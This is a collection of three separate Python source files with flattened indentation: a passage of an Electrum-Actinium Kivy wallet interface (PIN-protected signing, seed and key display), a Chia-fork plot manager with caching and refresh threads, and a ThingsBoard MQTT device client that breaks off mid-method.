from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_acm_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_acm_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_acm_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_acm_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum-actinium.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-Actinium', message,
app_icon=icon, app_name='Electrum-Actinium')
except ImportError:
Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error message bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an info message bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an information bubble.
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
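# Usage sketch (illustrative, not part of the original class): the error/info helpers
# above all funnel into show_info_bubble(). A plain call and the special 'texture'
# mode (used to show a QR texture full screen) look roughly like:
#
#     app.show_info_bubble(text=_('Copied'), duration=2, arrow_pos=None)
#     app.show_info_bubble(text='texture', icon=qr_texture, duration=0)
#
# where `app` is the running application instance and `qr_texture` is a Kivy texture
# object (both names are hypothetical here).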
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Iterator
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from cactus.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from cactus.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
stream_plot_info_pk,
stream_plot_info_ph,
)
from cactus.util.ints import uint16
from cactus.util.path import mkdir
from cactus.util.streamable import Streamable, streamable
from cactus.types.blockchain_format.proof_of_space import ProofOfSpace
from cactus.types.blockchain_format.sized_bytes import bytes32
from cactus.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
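# Illustrative round-trip sketch (not part of the original module): Cache persists a
# DiskCache Streamable, so a typical save/load cycle looks roughly like this
# (plot_id and the key objects are placeholders):
#
#     cache = Cache(root_path / "cache" / "plot_manager.dat")
#     cache.load()                                  # logs and continues if the file is missing
#     cache.update(plot_id, CacheEntry(pool_pk, None, plot_pk))
#     if cache.changed():
#         cache.save()                              # writes DiskCache(CURRENT_VERSION, items)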
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
show_memo: bool
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
show_memo: bool = False,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.show_memo = show_memo
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
# First drop all plots we have in plot_filename_paths but which are no longer in the filesystem or no longer set in the config
def plot_removed(test_path: Path):
return not test_path.exists() or test_path.parent not in plot_directories
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if plot_removed(loaded_plot):
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed += 1
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
if plot_removed(Path(path) / Path(plot_filename)):
paths_to_remove.append(path)
total_result.removed += 1
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
def batches() -> Iterator[Tuple[int, List[Path]]]:
if total_size > 0:
for batch_start in range(0, total_size, self.refresh_parameter.batch_size):
batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size)
yield total_size - batch_end, plot_paths[batch_start:batch_end]
else:
yield 0, []
for remaining, batch in batches():
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {total_result.loaded}, "
f"total_result.removed {total_result.removed}, "
f"total_duration {total_result.duration:.2f} seconds"
)
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that have the correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded += 1
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
if self.show_memo:
plot_memo: bytes32
if pool_contract_puzzle_hash is None:
plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk)
else:
plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk)
plot_memo_str: str = plot_memo.hex()
log.info(f"Memo: {plot_memo_str}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {result.loaded}, "
f"removed {result.removed}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
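# Minimal driver sketch (not part of the original module): how a harvester-like caller
# might wire up PlotManager. The root path and the empty key lists below are
# placeholders; on_refresh just logs the lifecycle events emitted by _refresh_task().
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)

    def on_refresh(event: PlotRefreshEvents, result: PlotRefreshResult) -> None:
        log.info(
            "refresh %s: loaded=%d removed=%d processed=%d remaining=%d",
            event, result.loaded, result.removed, result.processed, result.remaining,
        )

    manager = PlotManager(Path.home() / ".cactus" / "mainnet", on_refresh)
    manager.set_public_keys(farmer_public_keys=[], pool_public_keys=[])
    manager.start_refreshing()
    try:
        time.sleep(30)  # allow at least one refresh cycle to run
    finally:
        manager.stop_refreshing()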
|
tb_device_mqtt.py
|
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import queue
import ssl
import time
from threading import RLock
from threading import Thread
import paho.mqtt.client as paho
from simplejson import dumps
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
RPC_RESPONSE_TOPIC = 'v1/devices/me/rpc/response/'
RPC_REQUEST_TOPIC = 'v1/devices/me/rpc/request/'
ATTRIBUTES_TOPIC = 'v1/devices/me/attributes'
ATTRIBUTES_TOPIC_REQUEST = 'v1/devices/me/attributes/request/'
ATTRIBUTES_TOPIC_RESPONSE = 'v1/devices/me/attributes/response/'
TELEMETRY_TOPIC = 'v1/devices/me/telemetry'
log = logging.getLogger("tb_connection")
class TBTimeoutException(Exception):
pass
class TBQoSException(Exception):
pass
class TBPublishInfo:
TB_ERR_AGAIN = -1
TB_ERR_SUCCESS = 0
TB_ERR_NOMEM = 1
TB_ERR_PROTOCOL = 2
TB_ERR_INVAL = 3
TB_ERR_NO_CONN = 4
TB_ERR_CONN_REFUSED = 5
TB_ERR_NOT_FOUND = 6
TB_ERR_CONN_LOST = 7
TB_ERR_TLS = 8
TB_ERR_PAYLOAD_SIZE = 9
TB_ERR_NOT_SUPPORTED = 10
TB_ERR_AUTH = 11
TB_ERR_ACL_DENIED = 12
TB_ERR_UNKNOWN = 13
TB_ERR_ERRNO = 14
TB_ERR_QUEUE_SIZE = 15
def __init__(self, message_info):
self.message_info = message_info
# pylint: disable=invalid-name
def rc(self):
return self.message_info.rc
def mid(self):
return self.message_info.mid
def get(self):
self.message_info.wait_for_publish()
return self.message_info.rc
class TBDeviceMqttClient:
def __init__(self, host, port=1883, token=None, quality_of_service=None):
self._client = paho.Client()
self.quality_of_service = quality_of_service if quality_of_service is not None else 1
self.__host = host
self.__port = port
if token == "":
log.warning("token is not set, connection without tls wont be established")
else:
self._client.username_pw_set(token)
self._lock = RLock()
self._attr_request_dict = {}
self.stopped = False
self.__timeout_queue = queue.Queue()
self.__timeout_thread = Thread(target=self.__timeout_check)
self.__timeout_thread.daemon = True
self.__timeout_thread.start()
self.__is_connected = False
self.__device_on_server_side_rpc_response = None
self.__connect_callback = None
self.__device_max_sub_id = 0
self.__device_client_rpc_number = 0
self.__device_sub_dict = {}
self.__device_client_rpc_dict = {}
self.__attr_request_number = 0
self._client.on_connect = self._on_connect
# self._client.on_log = self._on_log
self._client.on_publish = self._on_publish
self._client.on_message = self._on_message
self._client.on_disconnect = self._on_disconnect
# def _on_log(self, client, userdata, level, buf):
# if isinstance(buf, Exception):
# log.exception(buf)
# else:
# log.debug("%s - %s - %s - %s", client, userdata, level, buf)
def _on_publish(self, client, userdata, result):
# log.debug("Data published to ThingsBoard!")
pass
def _on_disconnect(self, client, userdata, result_code):
prev_level = log.level
log.setLevel("DEBUG")
log.debug("Disconnected client: %s, user data: %s, result code: %s", str(client), str(userdata), str(result_code))
log.setLevel(prev_level)
def _on_connect(self, client, userdata, flags, result_code, *extra_params):
result_codes = {
1: "incorrect protocol version",
2: "invalid client identifier",
3: "server unavailable",
4: "bad username or password",
5: "not authorised",
}
if self.__connect_callback:
time.sleep(.05)
self.__connect_callback(client, userdata, flags, result_code, *extra_params)
if result_code == 0:
self.__is_connected = True
log.info("connection SUCCESS")
self._client.subscribe(ATTRIBUTES_TOPIC, qos=self.quality_of_service)
self._client.subscribe(ATTRIBUTES_TOPIC + "/response/+", qos=self.quality_of_service)
self._client.subscribe(RPC_REQUEST_TOPIC + '+', qos=self.quality_of_service)
self._client.subscribe(RPC_RESPONSE_TOPIC + '+', qos=self.quality_of_service)
else:
if result_code in result_codes:
log.error("connection FAIL with error %s %s", result_code, result_codes[result_code])
else:
log.error("connection FAIL with unknown error")
def is_connected(self):
return self.__is_connected
def connect(self, callback=None, min_reconnect_delay=1, timeout=120, tls=False, ca_certs=None, cert_file=None, key_file=None, keepalive=120):
if tls:
try:
self._client.tls_set(ca_certs=ca_certs,
certfile=cert_file,
keyfile=key_file,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_TLSv1_2,
ciphers=None)
self._client.tls_insecure_set(False)
except ValueError:
pass
self._client.connect(self.__host, self.__port, keepalive=keepalive)
self.reconnect_delay_set(min_reconnect_delay, timeout)
self._client.loop_start()
self.__connect_callback = callback
def disconnect(self):
self._client.disconnect()
log.debug(self._client)
log.debug("Disconnecting from ThingsBoard")
self.__is_connected = False
self._client.loop_stop()
def stop(self):
self.stopped = True
def _on_message(self, client, userdata, message):
content = TBUtility.decode(message)
self._on_decoded_message(content, message)
def _on_decoded_message(self, content, message):
if message.topic.startswith(RPC_REQUEST_TOPIC):
request_id = message.topic[len(RPC_REQUEST_TOPIC):len(message.topic)]
if self.__device_on_server_side_rpc_response:
self.__device_on_server_side_rpc_response(request_id, content)
elif message.topic.startswith(RPC_RESPONSE_TOPIC):
with self._lock:
request_id = int(message.topic[len(RPC_RESPONSE_TOPIC):len(message.topic)])
callback = self.__device_client_rpc_dict.pop(request_id)
callback(request_id, content, None)
elif message.topic == ATTRIBUTES_TOPIC:
dict_results = []
with self._lock:
# callbacks for everything
